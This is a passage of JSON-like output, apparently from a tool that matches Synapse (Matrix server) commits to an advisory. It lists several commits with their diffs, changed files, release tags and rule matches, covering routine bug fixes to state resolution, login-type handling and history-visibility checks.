type=EventTypes.Topic, state_key=\"\", content={}", + "+ ),", + "+ FakeEvent(", + "+ id=\"T4\", sender=ALICE, type=EventTypes.Topic, state_key=\"\", content={}", + "+ ),", + "+ ]", + "+", + "+ edges = [", + "+ [\"END\", \"T3\", \"PA2\", \"T2\", \"PA1\", \"T1\", \"START\"],", + "+ [\"END\", \"T4\", \"PB\", \"PA1\"],", + "+ ]", + "+", + "+ # We expect T3 to be picked as the other topics are pointing at older", + "+ # power levels. Note that without mainline ordering we'd pick T4 due to", + "+ # it being sent *after* T3.", + "+ expected_state_ids = [\"T3\", \"PA2\"]", + "+", + "+ self.do_check(events, edges, expected_state_ids)", + "+", + " def do_check(self, events, edges, expected_state_ids):" + ], + "changed_files": [ + "changelog.d/8971.bugfix", + "synapse/state/v2.py", + "tests/state/test_v2.py" + ], + "message_reference_content": [], + "jira_refs": {}, + "ghissue_refs": { + "8971": "Very slow state res in local rooms #8612" + }, + "cve_refs": [], + "twins": [], + "tags": [ + "v1.25.0", + "v1.25.0rc1", + "v1.26.0", + "v1.26.0-deb", + "v1.26.0rc1", + "v1.26.0rc2", + "v1.27.0", + "v1.27.0rc1", + "v1.27.0rc2", + "v1.28.0", + "v1.28.0rc1", + "v1.29.0", + "v1.29.0rc1", + "v1.30.0", + "v1.30.0rc1", + "v1.30.1", + "v1.31.0", + "v1.31.0rc1", + "v1.32.0", + "v1.32.0rc1", + "v1.32.1", + "v1.32.2", + "v1.33.0", + "v1.33.0rc1", + "v1.33.0rc2", + "v1.33.1", + "v1.33.2", + "v1.34.0", + "v1.34.0rc1", + "v1.35.0", + "v1.35.0rc1", + "v1.35.0rc2", + "v1.35.0rc3", + "v1.35.1", + "v1.36.0", + "v1.36.0rc1", + "v1.36.0rc2", + "v1.37.0", + "v1.37.0rc1", + "v1.37.1", + "v1.37.1a1", + "v1.37.1rc1", + "v1.38.0", + "v1.38.0rc1", + "v1.38.0rc2", + "v1.38.0rc3", + "v1.38.1", + "v1.39.0", + "v1.39.0rc1", + "v1.39.0rc2", + "v1.39.0rc3", + "v1.40.0", + "v1.40.0rc1", + "v1.40.0rc2", + "v1.40.0rc3", + "v1.41.0", + "v1.41.0rc1", + "v1.41.1", + "v1.42.0", + "v1.42.0rc1", + "v1.42.0rc2", + "v1.43.0", + "v1.43.0rc1", + "v1.43.0rc2", + "v1.44.0", + "v1.44.0rc1", + "v1.44.0rc2", + "v1.44.0rc3", + "v1.45.0", + "v1.45.0rc1", + "v1.45.0rc2", + "v1.45.1", + "v1.46-modular1", + "v1.46.0", + "v1.46.0rc1", + "v1.47.0", + "v1.47.0rc1", + "v1.47.0rc2", + "v1.47.0rc3", + "v1.47.1", + "v1.48.0", + "v1.48.0rc1", + "v1.49.0", + "v1.49.0rc1", + "v1.49.1", + "v1.49.2", + "v1.50.0", + "v1.50.0rc1", + "v1.50.0rc2", + "v1.50.1", + "v1.50.2", + "v1.51.0", + "v1.51.0rc1", + "v1.51.0rc2", + "v1.52.0", + "v1.52.0rc1", + "v1.53.0", + "v1.53.0rc1", + "v1.54.0", + "v1.54.0rc1", + "v1.55.0", + "v1.55.0rc1", + "v1.55.1", + "v1.55.2", + "v1.56.0", + "v1.56.0rc1", + "v1.57.0", + "v1.57.0rc1", + "v1.57.1", + "v1.58.0", + "v1.58.0rc1", + "v1.58.0rc2", + "v1.58.1", + "v1.59.0", + "v1.59.0rc1", + "v1.59.0rc2", + "v1.59.1", + "v1.60.0", + "v1.60.0rc1", + "v1.60.0rc2", + "v1.61.0", + "v1.61.0rc1", + "v1.61.1", + "v1.62.0", + "v1.62.0rc1", + "v1.62.0rc2", + "v1.62.0rc3", + "v1.63.0", + "v1.63.0rc1", + "v1.63.1", + "v1.64.0", + "v1.64.0rc1", + "v1.64.0rc2", + "v1.65.0", + "v1.65.0.post1.dev1", + "v1.65.0rc1", + "v1.65.0rc2", + "v1.66.0", + "v1.66.0rc1", + "v1.66.0rc2", + "v1.67.0", + "v1.67.0rc1", + "v1.68.0", + "v1.68.0rc1", + "v1.68.0rc2", + "v1.69.0", + "v1.69.0rc1", + "v1.69.0rc2", + "v1.69.0rc3", + "v1.69.0rc4", + "v1.70.0", + "v1.70.0rc1", + "v1.70.0rc2", + "v1.70.1", + "v1.71.0", + "v1.71.0rc1", + "v1.71.0rc2", + "v1.72.0", + "v1.72.0rc1", + "v1.73.0", + "v1.73.0rc1", + "v1.73.0rc2", + "v1.74.0", + "v1.74.0rc1", + "v1.75.0", + "v1.75.0rc1", + "v1.75.0rc2", + "v1.76.0", + "v1.76.0rc1", + "v1.76.0rc2", + "v1.77.0", + "v1.77.0rc1", + "v1.77.0rc2", + "v1.78.0", + "v1.78.0rc1", + "v1.79.0", + "v1.79.0rc1", + "v1.79.0rc2", + "v1.80.0", + "v1.80.0rc1", + "v1.80.0rc2", + "v1.81.0", + "v1.81.0rc1", + "v1.81.0rc2", + "v1.82.0", + "v1.82.0rc1", + "v1.83.0", + "v1.83.0rc1", + "v1.84.0", + "v1.84.0rc1", + "v1.84.1", + "v1.85.0", + "v1.85.0rc1", + "v1.85.0rc2", + "v1.85.1", + "v1.85.2", + "v1.86.0", + "v1.86.0rc1", + "v1.86.0rc2", + "v1.87.0", + "v1.87.0rc1", + "v1.88.0", + "v1.88.0rc1", + "v1.89.0", + "v1.89.0rc1", + "v1.90.0", + "v1.90.0rc1", + "v1.91.0", + "v1.91.0rc1", + "v1.91.1", + "v1.91.2", + "v1.92.0", + "v1.92.0rc1", + "v1.92.1", + "v1.92.2", + "v1.92.3", + "v1.93.0", + "v1.93.0rc1", + "v1.94.0", + "v1.94.0rc1", + "v1.95.0", + "v1.95.0rc1", + "v1.95.1", + "v1.96.0", + "v1.96.0rc1", + "v1.96.1", + "v1.97.0", + "v1.97.0rc1", + "v1.98.0", + "v1.98.0rc1" + ], + "matched_rules": [ + { + "id": "XREF_GH", + "message": "The commit and the advisory (including referenced pages) mention the same github issue: 8971, 8971", + "relevance": 32 + }, + { + "id": "GITHUB_ISSUE_IN_MESSAGE", + "message": "The commit message references some github issue: 8971", + "relevance": 2 + } + ] + }, + { + "commit_id": "6d02eb22dfde9551c515acaf73503e2500e00eaf", + "repository": "https://github.com/matrix-org/synapse", + "timestamp": 1607978523, + "hunks": 8, + "message": "Fix startup failure with localdb_enabled: False (#8937)", + "diff": [ + "diff --git a/changelog.d/8937.bugfix b/changelog.d/8937.bugfix", + "new file mode 100644", + "index 000000000..01e184844", + "--- /dev/null", + "+++ b/changelog.d/8937.bugfix", + "@@ -0,0 +1 @@", + "+Fix bug introduced in Synapse v1.24.0 which would cause an exception on startup if both `enabled` and `localdb_enabled` were set to `False` in the `password_config` setting of the configuration file.", + "diff --git a/synapse/handlers/auth.py b/synapse/handlers/auth.py", + "index 8deec4cd0..21e568f22 100644", + "--- a/synapse/handlers/auth.py", + "+++ b/synapse/handlers/auth.py", + "@@ -200,23 +200,21 @@ class AuthHandler(BaseHandler):", + "- # we keep this as a list despite the O(N^2) implication so that we can", + "- # keep PASSWORD first and avoid confusing clients which pick the first", + "- # type in the list. (NB that the spec doesn't require us to do so and", + "- # clients which favour types that they don't understand over those that", + "- # they do are technically broken)", + "-", + " # start out by assuming PASSWORD is enabled; we will remove it later if not.", + "- login_types = []", + "+ login_types = set()", + " if self._password_localdb_enabled:", + "- login_types.append(LoginType.PASSWORD)", + "+ login_types.add(LoginType.PASSWORD)", + " for provider in self.password_providers:", + "- if hasattr(provider, \"get_supported_login_types\"):", + "- for t in provider.get_supported_login_types().keys():", + "- if t not in login_types:", + "- login_types.append(t)", + "+ login_types.update(provider.get_supported_login_types().keys())", + " if not self._password_enabled:", + "+ login_types.discard(LoginType.PASSWORD)", + "+", + "+ # Some clients just pick the first type in the list. In this case, we want", + "+ # them to use PASSWORD (rather than token or whatever), so we want to make sure", + "+ # that comes first, where it's present.", + "+ self._supported_login_types = []", + "+ if LoginType.PASSWORD in login_types:", + "+ self._supported_login_types.append(LoginType.PASSWORD)", + " login_types.remove(LoginType.PASSWORD)", + "-", + "- self._supported_login_types = login_types", + "+ self._supported_login_types.extend(login_types)", + "diff --git a/tests/handlers/test_password_providers.py b/tests/handlers/test_password_providers.py", + "index ceaf0902d..8d5026514 100644", + "--- a/tests/handlers/test_password_providers.py", + "+++ b/tests/handlers/test_password_providers.py", + "@@ -432,2 +432,25 @@ class PasswordAuthProviderTests(unittest.HomeserverTestCase):", + "+ @override_config(", + "+ {", + "+ **providers_config(CustomAuthProvider),", + "+ \"password_config\": {\"enabled\": False, \"localdb_enabled\": False},", + "+ }", + "+ )", + "+ def test_custom_auth_password_disabled_localdb_enabled(self):", + "+ \"\"\"Check the localdb_enabled == enabled == False", + "+", + "+ Regression test for https://github.com/matrix-org/synapse/issues/8914: check", + "+ that setting *both* `localdb_enabled` *and* `password: enabled` to False doesn't", + "+ cause an exception.", + "+ \"\"\"", + "+ self.register_user(\"localuser\", \"localpass\")", + "+", + "+ flows = self._get_login_flows()", + "+ self.assertEqual(flows, [{\"type\": \"test.login_type\"}] + ADDITIONAL_LOGIN_FLOWS)", + "+", + "+ # login shouldn't work and should be rejected with a 400 (\"unknown login type\")", + "+ channel = self._send_password_login(\"localuser\", \"localpass\")", + "+ self.assertEqual(channel.code, 400, channel.result)", + "+ mock_password_provider.check_auth.assert_not_called()", + "+", + " @override_config(" + ], + "changed_files": [ + "changelog.d/8937.bugfix", + "synapse/handlers/auth.py", + "tests/handlers/test_password_providers.py" + ], + "message_reference_content": [], + "jira_refs": {}, + "ghissue_refs": { + "8937": "" + }, + "cve_refs": [], + "twins": [], + "tags": [ + "v1.25.0", + "v1.25.0rc1", + "v1.26.0", + "v1.26.0-deb", + "v1.26.0rc1", + "v1.26.0rc2", + "v1.27.0", + "v1.27.0rc1", + "v1.27.0rc2", + "v1.28.0", + "v1.28.0rc1", + "v1.29.0", + "v1.29.0rc1", + "v1.30.0", + "v1.30.0rc1", + "v1.30.1", + "v1.31.0", + "v1.31.0rc1", + "v1.32.0", + "v1.32.0rc1", + "v1.32.1", + "v1.32.2", + "v1.33.0", + "v1.33.0rc1", + "v1.33.0rc2", + "v1.33.1", + "v1.33.2", + "v1.34.0", + "v1.34.0rc1", + "v1.35.0", + "v1.35.0rc1", + "v1.35.0rc2", + "v1.35.0rc3", + "v1.35.1", + "v1.36.0", + "v1.36.0rc1", + "v1.36.0rc2", + "v1.37.0", + "v1.37.0rc1", + "v1.37.1", + "v1.37.1a1", + "v1.37.1rc1", + "v1.38.0", + "v1.38.0rc1", + "v1.38.0rc2", + "v1.38.0rc3", + "v1.38.1", + "v1.39.0", + "v1.39.0rc1", + "v1.39.0rc2", + "v1.39.0rc3", + "v1.40.0", + "v1.40.0rc1", + "v1.40.0rc2", + "v1.40.0rc3", + "v1.41.0", + "v1.41.0rc1", + "v1.41.1", + "v1.42.0", + "v1.42.0rc1", + "v1.42.0rc2", + "v1.43.0", + "v1.43.0rc1", + "v1.43.0rc2", + "v1.44.0", + "v1.44.0rc1", + "v1.44.0rc2", + "v1.44.0rc3", + "v1.45.0", + "v1.45.0rc1", + "v1.45.0rc2", + "v1.45.1", + "v1.46-modular1", + "v1.46.0", + "v1.46.0rc1", + "v1.47.0", + "v1.47.0rc1", + "v1.47.0rc2", + "v1.47.0rc3", + "v1.47.1", + "v1.48.0", + "v1.48.0rc1", + "v1.49.0", + "v1.49.0rc1", + "v1.49.1", + "v1.49.2", + "v1.50.0", + "v1.50.0rc1", + "v1.50.0rc2", + "v1.50.1", + "v1.50.2", + "v1.51.0", + "v1.51.0rc1", + "v1.51.0rc2", + "v1.52.0", + "v1.52.0rc1", + "v1.53.0", + "v1.53.0rc1", + "v1.54.0", + "v1.54.0rc1", + "v1.55.0", + "v1.55.0rc1", + "v1.55.1", + "v1.55.2", + "v1.56.0", + "v1.56.0rc1", + "v1.57.0", + "v1.57.0rc1", + "v1.57.1", + "v1.58.0", + "v1.58.0rc1", + "v1.58.0rc2", + "v1.58.1", + "v1.59.0", + "v1.59.0rc1", + "v1.59.0rc2", + "v1.59.1", + "v1.60.0", + "v1.60.0rc1", + "v1.60.0rc2", + "v1.61.0", + "v1.61.0rc1", + "v1.61.1", + "v1.62.0", + "v1.62.0rc1", + "v1.62.0rc2", + "v1.62.0rc3", + "v1.63.0", + "v1.63.0rc1", + "v1.63.1", + "v1.64.0", + "v1.64.0rc1", + "v1.64.0rc2", + "v1.65.0", + "v1.65.0.post1.dev1", + "v1.65.0rc1", + "v1.65.0rc2", + "v1.66.0", + "v1.66.0rc1", + "v1.66.0rc2", + "v1.67.0", + "v1.67.0rc1", + "v1.68.0", + "v1.68.0rc1", + "v1.68.0rc2", + "v1.69.0", + "v1.69.0rc1", + "v1.69.0rc2", + "v1.69.0rc3", + "v1.69.0rc4", + "v1.70.0", + "v1.70.0rc1", + "v1.70.0rc2", + "v1.70.1", + "v1.71.0", + "v1.71.0rc1", + "v1.71.0rc2", + "v1.72.0", + "v1.72.0rc1", + "v1.73.0", + "v1.73.0rc1", + "v1.73.0rc2", + "v1.74.0", + "v1.74.0rc1", + "v1.75.0", + "v1.75.0rc1", + "v1.75.0rc2", + "v1.76.0", + "v1.76.0rc1", + "v1.76.0rc2", + "v1.77.0", + "v1.77.0rc1", + "v1.77.0rc2", + "v1.78.0", + "v1.78.0rc1", + "v1.79.0", + "v1.79.0rc1", + "v1.79.0rc2", + "v1.80.0", + "v1.80.0rc1", + "v1.80.0rc2", + "v1.81.0", + "v1.81.0rc1", + "v1.81.0rc2", + "v1.82.0", + "v1.82.0rc1", + "v1.83.0", + "v1.83.0rc1", + "v1.84.0", + "v1.84.0rc1", + "v1.84.1", + "v1.85.0", + "v1.85.0rc1", + "v1.85.0rc2", + "v1.85.1", + "v1.85.2", + "v1.86.0", + "v1.86.0rc1", + "v1.86.0rc2", + "v1.87.0", + "v1.87.0rc1", + "v1.88.0", + "v1.88.0rc1", + "v1.89.0", + "v1.89.0rc1", + "v1.90.0", + "v1.90.0rc1", + "v1.91.0", + "v1.91.0rc1", + "v1.91.1", + "v1.91.2", + "v1.92.0", + "v1.92.0rc1", + "v1.92.1", + "v1.92.2", + "v1.92.3", + "v1.93.0", + "v1.93.0rc1", + "v1.94.0", + "v1.94.0rc1", + "v1.95.0", + "v1.95.0rc1", + "v1.95.1", + "v1.96.0", + "v1.96.0rc1", + "v1.96.1", + "v1.97.0", + "v1.97.0rc1", + "v1.98.0", + "v1.98.0rc1" + ], + "matched_rules": [ + { + "id": "XREF_GH", + "message": "The commit and the advisory (including referenced pages) mention the same github issue: 8937, 8937", + "relevance": 32 + }, + { + "id": "GITHUB_ISSUE_IN_MESSAGE", + "message": "The commit message references some github issue: 8937", + "relevance": 2 + } + ] + }, + { + "commit_id": "be2db93b3c14396d53d30f8d5f92db014453487b", + "repository": "https://github.com/matrix-org/synapse", + "timestamp": 1608126397, + "hunks": 30, + "message": "Do not assume that the contents dictionary includes history_visibility. (#8945)", + "diff": [ + "diff --git a/changelog.d/8945.bugfix b/changelog.d/8945.bugfix", + "new file mode 100644", + "index 000000000..f9e6dbba5", + "--- /dev/null", + "+++ b/changelog.d/8945.bugfix", + "@@ -0,0 +1 @@", + "+Fix a bug where 500 errors would be returned if the `m.room_history_visibility` event had invalid content.", + "diff --git a/synapse/api/auth.py b/synapse/api/auth.py", + "index 1951f6e17..48c4d7b0b 100644", + "--- a/synapse/api/auth.py", + "+++ b/synapse/api/auth.py", + "@@ -25,3 +25,3 @@ from synapse import event_auth", + " from synapse.api.auth_blocking import AuthBlocking", + "-from synapse.api.constants import EventTypes, Membership", + "+from synapse.api.constants import EventTypes, HistoryVisibility, Membership", + " from synapse.api.errors import (", + "@@ -650,3 +650,4 @@ class Auth:", + " visibility", + "- and visibility.content[\"history_visibility\"] == \"world_readable\"", + "+ and visibility.content.get(\"history_visibility\")", + "+ == HistoryVisibility.WORLD_READABLE", + " ):", + "diff --git a/synapse/api/constants.py b/synapse/api/constants.py", + "index 592abd844..1932df83b 100644", + "--- a/synapse/api/constants.py", + "+++ b/synapse/api/constants.py", + "@@ -162 +162,8 @@ class AccountDataTypes:", + " IGNORED_USER_LIST = \"m.ignored_user_list\"", + "+", + "+", + "+class HistoryVisibility:", + "+ INVITED = \"invited\"", + "+ JOINED = \"joined\"", + "+ SHARED = \"shared\"", + "+ WORLD_READABLE = \"world_readable\"", + "diff --git a/synapse/handlers/room.py b/synapse/handlers/room.py", + "index 758341894..1f809fa16 100644", + "--- a/synapse/handlers/room.py", + "+++ b/synapse/handlers/room.py", + "@@ -29,2 +29,3 @@ from synapse.api.constants import (", + " EventTypes,", + "+ HistoryVisibility,", + " JoinRules,", + "@@ -83,3 +84,3 @@ class RoomCreationHandler(BaseHandler):", + " \"join_rules\": JoinRules.INVITE,", + "- \"history_visibility\": \"shared\",", + "+ \"history_visibility\": HistoryVisibility.SHARED,", + " \"original_invitees_have_ops\": False,", + "@@ -90,3 +91,3 @@ class RoomCreationHandler(BaseHandler):", + " \"join_rules\": JoinRules.INVITE,", + "- \"history_visibility\": \"shared\",", + "+ \"history_visibility\": HistoryVisibility.SHARED,", + " \"original_invitees_have_ops\": True,", + "@@ -97,3 +98,3 @@ class RoomCreationHandler(BaseHandler):", + " \"join_rules\": JoinRules.PUBLIC,", + "- \"history_visibility\": \"shared\",", + "+ \"history_visibility\": HistoryVisibility.SHARED,", + " \"original_invitees_have_ops\": False,", + "diff --git a/synapse/handlers/room_list.py b/synapse/handlers/room_list.py", + "index 4a13c8e91..bf58d302b 100644", + "--- a/synapse/handlers/room_list.py", + "+++ b/synapse/handlers/room_list.py", + "@@ -22,3 +22,3 @@ from unpaddedbase64 import decode_base64, encode_base64", + "-from synapse.api.constants import EventTypes, JoinRules", + "+from synapse.api.constants import EventTypes, HistoryVisibility, JoinRules", + " from synapse.api.errors import Codes, HttpResponseException", + "@@ -161,3 +161,4 @@ class RoomListHandler(BaseHandler):", + " \"avatar_url\": room[\"avatar\"],", + "- \"world_readable\": room[\"history_visibility\"] == \"world_readable\",", + "+ \"world_readable\": room[\"history_visibility\"]", + "+ == HistoryVisibility.WORLD_READABLE,", + " \"guest_can_join\": room[\"guest_access\"] == \"can_join\",", + "@@ -319,3 +320,3 @@ class RoomListHandler(BaseHandler):", + " visibility = visibility_event.content.get(\"history_visibility\", None)", + "- result[\"world_readable\"] = visibility == \"world_readable\"", + "+ result[\"world_readable\"] = visibility == HistoryVisibility.WORLD_READABLE", + "diff --git a/synapse/handlers/user_directory.py b/synapse/handlers/user_directory.py", + "index f263a638f..3d80371f0 100644", + "--- a/synapse/handlers/user_directory.py", + "+++ b/synapse/handlers/user_directory.py", + "@@ -18,3 +18,3 @@ import logging", + " import synapse.metrics", + "-from synapse.api.constants import EventTypes, JoinRules, Membership", + "+from synapse.api.constants import EventTypes, HistoryVisibility, JoinRules, Membership", + " from synapse.handlers.state_deltas import StateDeltasHandler", + "@@ -252,3 +252,3 @@ class UserDirectoryHandler(StateDeltasHandler):", + " key_name=\"history_visibility\",", + "- public_value=\"world_readable\",", + "+ public_value=HistoryVisibility.WORLD_READABLE,", + " )", + "diff --git a/synapse/notifier.py b/synapse/notifier.py", + "index a17352ef4..c4c8bb271 100644", + "--- a/synapse/notifier.py", + "+++ b/synapse/notifier.py", + "@@ -36,3 +36,3 @@ from twisted.internet import defer", + " import synapse.server", + "-from synapse.api.constants import EventTypes, Membership", + "+from synapse.api.constants import EventTypes, HistoryVisibility, Membership", + " from synapse.api.errors import AuthError", + "@@ -613,3 +613,5 @@ class Notifier:", + " if state and \"history_visibility\" in state.content:", + "- return state.content[\"history_visibility\"] == \"world_readable\"", + "+ return (", + "+ state.content[\"history_visibility\"] == HistoryVisibility.WORLD_READABLE", + "+ )", + " else:", + "diff --git a/synapse/storage/databases/main/user_directory.py b/synapse/storage/databases/main/user_directory.py", + "index d87ceec6d..fc8caf46a 100644", + "--- a/synapse/storage/databases/main/user_directory.py", + "+++ b/synapse/storage/databases/main/user_directory.py", + "@@ -19,3 +19,3 @@ from typing import Any, Dict, Iterable, Optional, Set, Tuple", + "-from synapse.api.constants import EventTypes, JoinRules", + "+from synapse.api.constants import EventTypes, HistoryVisibility, JoinRules", + " from synapse.storage.database import DatabasePool", + "@@ -362,3 +362,6 @@ class UserDirectoryBackgroundUpdateStore(StateDeltasStore):", + " if hist_vis_ev:", + "- if hist_vis_ev.content.get(\"history_visibility\") == \"world_readable\":", + "+ if (", + "+ hist_vis_ev.content.get(\"history_visibility\")", + "+ == HistoryVisibility.WORLD_READABLE", + "+ ):", + " return True", + "diff --git a/synapse/visibility.py b/synapse/visibility.py", + "index 527365498..f2836ba9f 100644", + "--- a/synapse/visibility.py", + "+++ b/synapse/visibility.py", + "@@ -14,3 +14,2 @@", + " # limitations under the License.", + "-", + " import logging", + "@@ -18,3 +17,8 @@ import operator", + "-from synapse.api.constants import AccountDataTypes, EventTypes, Membership", + "+from synapse.api.constants import (", + "+ AccountDataTypes,", + "+ EventTypes,", + "+ HistoryVisibility,", + "+ Membership,", + "+)", + " from synapse.events.utils import prune_event", + "@@ -27,3 +31,8 @@ logger = logging.getLogger(__name__)", + "-VISIBILITY_PRIORITY = (\"world_readable\", \"shared\", \"invited\", \"joined\")", + "+VISIBILITY_PRIORITY = (", + "+ HistoryVisibility.WORLD_READABLE,", + "+ HistoryVisibility.SHARED,", + "+ HistoryVisibility.INVITED,", + "+ HistoryVisibility.JOINED,", + "+)", + "@@ -152,8 +161,10 @@ async def filter_events_for_client(", + " if visibility_event:", + "- visibility = visibility_event.content.get(\"history_visibility\", \"shared\")", + "+ visibility = visibility_event.content.get(", + "+ \"history_visibility\", HistoryVisibility.SHARED", + "+ )", + " else:", + "- visibility = \"shared\"", + "+ visibility = HistoryVisibility.SHARED", + " if visibility not in VISIBILITY_PRIORITY:", + "- visibility = \"shared\"", + "+ visibility = HistoryVisibility.SHARED", + "@@ -167,3 +178,3 @@ async def filter_events_for_client(", + " if prev_visibility not in VISIBILITY_PRIORITY:", + "- prev_visibility = \"shared\"", + "+ prev_visibility = HistoryVisibility.SHARED", + "@@ -212,3 +223,3 @@ async def filter_events_for_client(", + "- if visibility == \"joined\":", + "+ if visibility == HistoryVisibility.JOINED:", + " # we weren't a member at the time of the event, so we can't", + "@@ -217,3 +228,3 @@ async def filter_events_for_client(", + "- elif visibility == \"invited\":", + "+ elif visibility == HistoryVisibility.INVITED:", + " # user can also see the event if they were *invited* at the time", + "@@ -222,3 +233,3 @@ async def filter_events_for_client(", + "- elif visibility == \"shared\" and is_peeking:", + "+ elif visibility == HistoryVisibility.SHARED and is_peeking:", + " # if the visibility is shared, users cannot see the event unless", + "@@ -286,4 +297,6 @@ async def filter_events_for_server(", + " if history:", + "- visibility = history.content.get(\"history_visibility\", \"shared\")", + "- if visibility in [\"invited\", \"joined\"]:", + "+ visibility = history.content.get(", + "+ \"history_visibility\", HistoryVisibility.SHARED", + "+ )", + "+ if visibility in [HistoryVisibility.INVITED, HistoryVisibility.JOINED]:", + " # We now loop through all state events looking for", + "@@ -307,3 +320,3 @@ async def filter_events_for_server(", + " elif memtype == Membership.INVITE:", + "- if visibility == \"invited\":", + "+ if visibility == HistoryVisibility.INVITED:", + " return True", + "@@ -338,3 +351,4 @@ async def filter_events_for_server(", + " all_open = all(", + "- e.content.get(\"history_visibility\") in (None, \"shared\", \"world_readable\")", + "+ e.content.get(\"history_visibility\")", + "+ in (None, HistoryVisibility.SHARED, HistoryVisibility.WORLD_READABLE)", + " for e in event_map.values()" + ], + "changed_files": [ + "changelog.d/8945.bugfix", + "synapse/api/auth.py", + "synapse/api/constants.py", + "synapse/handlers/room.py", + "synapse/handlers/room_list.py", + "synapse/handlers/user_directory.py", + "synapse/notifier.py", + "synapse/storage/databases/main/user_directory.py", + "synapse/visibility.py" + ], + "message_reference_content": [], + "jira_refs": {}, + "ghissue_refs": { + "8945": "" + }, + "cve_refs": [], + "twins": [], + "tags": [ + "v1.25.0", + "v1.25.0rc1", + "v1.26.0", + "v1.26.0-deb", + "v1.26.0rc1", + "v1.26.0rc2", + "v1.27.0", + "v1.27.0rc1", + "v1.27.0rc2", + "v1.28.0", + "v1.28.0rc1", + "v1.29.0", + "v1.29.0rc1", + "v1.30.0", + "v1.30.0rc1", + "v1.30.1", + "v1.31.0", + "v1.31.0rc1", + "v1.32.0", + "v1.32.0rc1", + "v1.32.1", + "v1.32.2", + "v1.33.0", + "v1.33.0rc1", + "v1.33.0rc2", + "v1.33.1", + "v1.33.2", + "v1.34.0", + "v1.34.0rc1", + "v1.35.0", + "v1.35.0rc1", + "v1.35.0rc2", + "v1.35.0rc3", + "v1.35.1", + "v1.36.0", + "v1.36.0rc1", + "v1.36.0rc2", + "v1.37.0", + "v1.37.0rc1", + "v1.37.1", + "v1.37.1a1", + "v1.37.1rc1", + "v1.38.0", + "v1.38.0rc1", + "v1.38.0rc2", + "v1.38.0rc3", + "v1.38.1", + "v1.39.0", + "v1.39.0rc1", + "v1.39.0rc2", + "v1.39.0rc3", + "v1.40.0", + "v1.40.0rc1", + "v1.40.0rc2", + "v1.40.0rc3", + "v1.41.0", + "v1.41.0rc1", + "v1.41.1", + "v1.42.0", + "v1.42.0rc1", + "v1.42.0rc2", + "v1.43.0", + "v1.43.0rc1", + "v1.43.0rc2", + "v1.44.0", + "v1.44.0rc1", + "v1.44.0rc2", + "v1.44.0rc3", + "v1.45.0", + "v1.45.0rc1", + "v1.45.0rc2", + "v1.45.1", + "v1.46-modular1", + "v1.46.0", + "v1.46.0rc1", + "v1.47.0", + "v1.47.0rc1", + "v1.47.0rc2", + "v1.47.0rc3", + "v1.47.1", + "v1.48.0", + "v1.48.0rc1", + "v1.49.0", + "v1.49.0rc1", + "v1.49.1", + "v1.49.2", + "v1.50.0", + "v1.50.0rc1", + "v1.50.0rc2", + "v1.50.1", + "v1.50.2", + "v1.51.0", + "v1.51.0rc1", + "v1.51.0rc2", + "v1.52.0", + "v1.52.0rc1", + "v1.53.0", + "v1.53.0rc1", + "v1.54.0", + "v1.54.0rc1", + "v1.55.0", + "v1.55.0rc1", + "v1.55.1", + "v1.55.2", + "v1.56.0", + "v1.56.0rc1", + "v1.57.0", + "v1.57.0rc1", + "v1.57.1", + "v1.58.0", + "v1.58.0rc1", + "v1.58.0rc2", + "v1.58.1", + "v1.59.0", + "v1.59.0rc1", + "v1.59.0rc2", + "v1.59.1", + "v1.60.0", + "v1.60.0rc1", + "v1.60.0rc2", + "v1.61.0", + "v1.61.0rc1", + "v1.61.1", + "v1.62.0", + "v1.62.0rc1", + "v1.62.0rc2", + "v1.62.0rc3", + "v1.63.0", + "v1.63.0rc1", + "v1.63.1", + "v1.64.0", + "v1.64.0rc1", + "v1.64.0rc2", + "v1.65.0", + "v1.65.0.post1.dev1", + "v1.65.0rc1", + "v1.65.0rc2", + "v1.66.0", + "v1.66.0rc1", + "v1.66.0rc2", + "v1.67.0", + "v1.67.0rc1", + "v1.68.0", + "v1.68.0rc1", + "v1.68.0rc2", + "v1.69.0", + "v1.69.0rc1", + "v1.69.0rc2", + "v1.69.0rc3", + "v1.69.0rc4", + "v1.70.0", + "v1.70.0rc1", + "v1.70.0rc2", + "v1.70.1", + "v1.71.0", + "v1.71.0rc1", + "v1.71.0rc2", + "v1.72.0", + "v1.72.0rc1", + "v1.73.0", + "v1.73.0rc1", + "v1.73.0rc2", + "v1.74.0", + "v1.74.0rc1", + "v1.75.0", + "v1.75.0rc1", + "v1.75.0rc2", + "v1.76.0", + "v1.76.0rc1", + "v1.76.0rc2", + "v1.77.0", + "v1.77.0rc1", + "v1.77.0rc2", + "v1.78.0", + "v1.78.0rc1", + "v1.79.0", + "v1.79.0rc1", + "v1.79.0rc2", + "v1.80.0", + "v1.80.0rc1", + "v1.80.0rc2", + "v1.81.0", + "v1.81.0rc1", + "v1.81.0rc2", + "v1.82.0", + "v1.82.0rc1", + "v1.83.0", + "v1.83.0rc1", + "v1.84.0", + "v1.84.0rc1", + "v1.84.1", + "v1.85.0", + "v1.85.0rc1", + "v1.85.0rc2", + "v1.85.1", + "v1.85.2", + "v1.86.0", + "v1.86.0rc1", + "v1.86.0rc2", + "v1.87.0", + "v1.87.0rc1", + "v1.88.0", + "v1.88.0rc1", + "v1.89.0", + "v1.89.0rc1", + "v1.90.0", + "v1.90.0rc1", + "v1.91.0", + "v1.91.0rc1", + "v1.91.1", + "v1.91.2", + "v1.92.0", + "v1.92.0rc1", + "v1.92.1", + "v1.92.2", + "v1.92.3", + "v1.93.0", + "v1.93.0rc1", + "v1.94.0", + "v1.94.0rc1", + "v1.95.0", + "v1.95.0rc1", + "v1.95.1", + "v1.96.0", + "v1.96.0rc1", + "v1.96.1", + "v1.97.0", + "v1.97.0rc1", + "v1.98.0", + "v1.98.0rc1" + ], + "matched_rules": [ + { + "id": "XREF_GH", + "message": "The commit and the advisory (including referenced pages) mention the same github issue: 8945, 8945", + "relevance": 32 + }, + { + "id": "GITHUB_ISSUE_IN_MESSAGE", + "message": "The commit message references some github issue: 8945", + "relevance": 2 + } + ] + }, + { + "commit_id": "06006058d7bf6744078109875cd27f47197aeafa", + "repository": "https://github.com/matrix-org/synapse", + "timestamp": 1608201817, + "hunks": 12, + "message": "Make search statement in List Room and User Admin API case-insensitive (#8931)", + "diff": [ + "diff --git a/changelog.d/8931.feature b/changelog.d/8931.feature", + "new file mode 100644", + "index 000000000..35c720eb8", + "--- /dev/null", + "+++ b/changelog.d/8931.feature", + "@@ -0,0 +1 @@", + "+Make search statement in List Room and List User Admin API case-insensitive.", + "\\ No newline at end of file", + "diff --git a/synapse/storage/databases/main/__init__.py b/synapse/storage/databases/main/__init__.py", + "index 871fb646a..701748f93 100644", + "--- 